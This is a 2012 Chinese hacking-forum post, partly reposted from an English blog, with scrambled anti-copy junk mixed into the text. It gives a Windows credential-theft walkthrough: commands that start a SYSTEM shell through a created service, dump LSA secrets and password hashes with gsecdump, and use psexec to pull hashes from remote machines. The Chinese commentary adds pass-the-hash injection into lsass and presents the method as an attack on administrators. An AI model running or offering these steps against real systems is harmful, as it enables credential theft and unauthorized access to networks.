找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1971|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
) A) V% Z: V& \1 F/ ~& j/ w
- q. {3 n" S* L6 N5 g! P5 Z" n3 BC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
) K+ B* _9 k6 ]8 f7 E: n4 p[SC] CreateService SUCCESS
4 O7 V* b4 w0 y# j% Y* {
: D3 h/ I6 Y, v/ x, {# ^2 WC:\>sc start shellcmdline
- b; k, }  j/ Z[SC] StartService FAILED 1053:; X$ A% K& R8 w  I$ T4 |6 A
$ q8 {* R: [: b; s
The service did not respond to the start or control request in a timely fashion.
8 c- x' n! h3 Q% ?! M% @5 D0 u* W/ d3 s& w
C:\>sc delete shellcmdline( R8 f6 a, x, n, ]# ~/ z3 G
[SC] DeleteService SUCCESS
4 r* M+ \4 z" _
( i. }& h% g9 O- b' o------------
; }5 Y9 y1 M/ g2 K4 ?
; l* e! j& ^, Z( d3 S* l" JThen in the new DOS window:
2 K5 p1 V+ T# f0 A# V, ?
) Q& S6 T7 _0 d9 z$ Z1 h' WMicrosoft Windows XP [Version 5.1.2600]
% [& v  H" J0 a7 ]9 K(C) Copyright 1985-2001 Microsoft Corp.
* X" ?! L* ]- G. N8 C' H( W0 D# O2 \( m+ ~
C:\WINDOWS\system32>whoami. p  k! F5 v/ R" |) |5 p
NT AUTHORITY\SYSTEM8 H( y8 V. y& F4 b9 s+ P6 @: ^

9 X4 k0 {, ^, |$ }6 f$ F" D7 EC:\WINDOWS\system32>gsecdump -h( E( n' H. v& O$ V! V3 c
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)( V% A/ u$ n1 S
usage: gsecdump [options], u: J4 \& l7 h& }7 s
1 I6 d  n) ~1 H8 r  }6 P$ `- a! y
options:; l: S- E' Q. G
-h [ --help ] show help) N- M& Q$ K3 ?- d1 {3 J2 i2 X+ }8 R' s
-a [ --dump_all ] dump all secrets
, j. h7 L. E; u; K: D-l [ --dump_lsa ] dump lsa secrets
3 }+ U7 ?( J  U# Y1 q9 v) \0 n-w [ --dump_wireless ] dump microsoft wireless connections
4 K/ b3 k7 d: ^' {7 b( e% N-u [ --dump_usedhashes ] dump hashes from active logon sessions+ g, D0 y& O+ U; y0 {: B* D
-s [ --dump_hashes ] dump hashes from SAM/AD2 k( q  R; o- q/ ]8 n
* w0 c9 h5 @. r# A5 f' _3 w
Although I like to use:
, n& J; w3 ~- A: F( r! J  V& ?+ Z) D% h+ y# Y$ E8 q
PsExec v1.83 - Execute processes remotely: P* v' ]1 |+ K+ Q2 B8 a
Copyright (C) 2001-2007 Mark Russinovich
, e& P8 y. m3 e" t; I* xSysinternals - 链接标记[url]www.sysinternals.com[/url]
9 i. P' f7 G( H* n. h+ x2 C# a6 K- `% {+ j" ]7 Q( _: o
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT$ f9 m' U# K8 n7 {. X- {

5 u2 L/ }2 }. P) f6 Eto get the hashes from active logon sessions of a remote system.! ~6 Q2 T. I4 g
0 r* w2 @0 w2 i/ {4 h/ A
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
- a4 a! `- i+ }# \! Y3 k+ U! T/ o& T9 I, X/ j$ z8 |. _
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.' m8 j+ E+ V+ A2 ?; F3 x; D
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]( t; ^2 R1 D0 n6 I4 Z& d; \
; @- I7 m5 }0 ]* y2 R/ e
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
" Q6 c$ K" d, D! s) `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表